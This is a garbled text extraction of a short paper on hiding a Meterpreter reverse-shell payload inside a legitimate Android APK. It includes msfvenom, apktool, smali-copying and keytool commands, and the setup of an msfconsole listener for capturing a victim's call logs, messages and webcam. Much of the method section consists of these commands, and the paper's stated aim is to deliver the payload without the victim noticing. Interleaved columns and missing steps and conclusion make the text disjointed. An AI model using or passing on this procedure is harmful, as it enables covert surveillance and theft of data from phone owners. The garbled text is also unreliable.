Exploitan Androiddeviceusingpayloadinjected APK
Exploitan Androiddeviceusingpayloadinjected APK
net/publication/361879584
CITATIONS READS
0 15,362
1 author:
SEE PROFILE
All content following this page was uploaded by Pasindu Bandara Aththanayaka on 09 July 2022.
Abstract—Android operating system is a popular and a process to hack mobile phones which focus mainly on
expeditious-growing open-source operating system in the mobile accessing telephone calls, voice messages, and text messages.
device domain. Concurrently, the android operating system is It also identifies the weakness during a system or network
kind of vulnerably susceptible since it is an open-source which helps to take advantage of the system and gain
operating system. Users are likely to download and install the unauthorized access to data.
applications which are written by attackers maliciously. We
learned and examined that an android device can be exploited Exploitation is a feature to find out vulnerabilities. It is a
utilizing a malicious APK. Once the victim downloads and malicious form of code that can take advantage of a
installs the malicious APK we as attackers can facilely obtain vulnerability in an operating system or a software without
details in the victim's mobile device. We select this domain by users' permission. To do this exploitation we choose a mobile
considering a few objectives. The main motive to select this device that runs Android operating system. MSFvenom and
domain is the intensity of this topic and since the majority of the Metasploit framework are combined to exploit an Android
society using mobile devices which are running the Android device. MSFvenom is used to create payload and The
operating system, this kind of attack also can happen to us. Metasploit framework used to exploit the android device. In
addition to that, apktool, keytool, jarsigner are support to
This research paper summarily describes how to perform
inject a payload to an original android package (APK).
exploitation on an android device using tools provided by the
Kali Linux operating system such as MSFvenom, Metasploit
framework. our intention is to gain access to an android device
using the Metasploit framework. To do that we utilizing a MSFvenom - The Msfvenom is a feature of Metasploit which
payload that we create using MSFvenom. The main issue we utilize to generate payloads and output all of the various types
faced in this research is, how to send a payload to the victim's of shellcode that are available in Metasploit. The offensive
phone without letting the victim know that this payload is a
malicious payload. To overcome that issue, we are utilizing an security states that MSFvenom is a combination of
original APK and inject a payload to that particular APK with Msfpayload and Msfencode combine both of these tools into
the help of tools such as apktool and keytool. a single Framework instance [1]. In this research, we use
MSFvenom to create the payload which we need to inject into
Keywords - Android, Vulnerability, Exploit, MSF venom,
the original android package.
Metasploit framework, Payload, APK tool, keytool
Msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.43.15 LPORT=5555 R > payload.apk
apktool d payload.apk
d stands for decode and payload.apk is the payload that Fig. 5. – Finding the path to the mainactivity file
needed to be decoded.
In this case com.android.SplashActivity is the path for
mainactivity file. Splashctivity is the name of mainactivity
file in this example.
cp -r payload/smali/com/* runbird/smali/com/
apktool b runbird
keytool -genkey -v -keystore key1.keystore Step 12 – Exploit victim’s device using MSFconsole
alias kali -keyalg RSA -keysize 1024 -validity 22222
This is the last and most important step of this exploitation.
-genkey is used to generate a key, -keystore is used to define MSFconsole will be used throughout this step.
the name of the key. -alias is to define the entity name to the
keystore. -keyalg is used to define the algorithm use to create Step 12.1 – Setup the listener
To perform the exploitation. A listener should be created in Once the victim opens the application. A session will open
order to interact with the apk we sent to the victim’s device. in msfconsole.
A listener can be created using msfconsole. By entering
msfconsole in kali terminal we can open up the msfconsole.
Step 12.2 – Exploit 5. webcam_stream to exploit the camera of the victim device
After creating the listener, we can enter give the command
exploit to start the exploitation. Results we received by entering these commands such as call
logs, text messages and system information can be considered
as the results of this exploitation.
V. CONCLUSION
VI. REFERENCES